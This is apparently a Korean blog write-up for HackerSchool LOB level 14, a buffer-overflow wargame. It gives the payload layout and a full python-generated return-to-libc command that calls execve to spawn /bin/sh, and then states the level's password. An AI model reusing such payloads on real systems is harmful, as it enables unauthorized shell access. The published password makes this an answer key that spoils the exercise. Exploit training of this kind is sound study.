코드를 해석해보자면
간단히말해서 execve함수를 사용해서 풀라는 뜻이다.
페이로드는 [non 44] [&execve] [non 4] [/bin/sh] [argv0] [nob]
./$"`python -c 'print "\xf9\xbf\x0f\x40"'`" "`python -c 'print "\x90"*44+"\x48\x9d\x0a\x40"+"\x90"*4+"\xf9\xbf\x0f\x40"+"\xf7\xff\xff\xbf"+"\xfc\xff\xff\xbf"'`"
비밀번호는 one step closer 이다
'Hacking > LOB(RedHat)' 카테고리의 다른 글
| HackerSchool LOB Level 16 (0) | 2015.08.29 |
|---|---|
| HackerSchool LOB Level 15 (0) | 2015.08.27 |
| HackerSchool LOB Level 13 (0) | 2015.08.05 |
| HackerSchool LOB Level 12 (0) | 2015.08.01 |
| HackerSchool LOB Level 11 (0) | 2015.07.28 |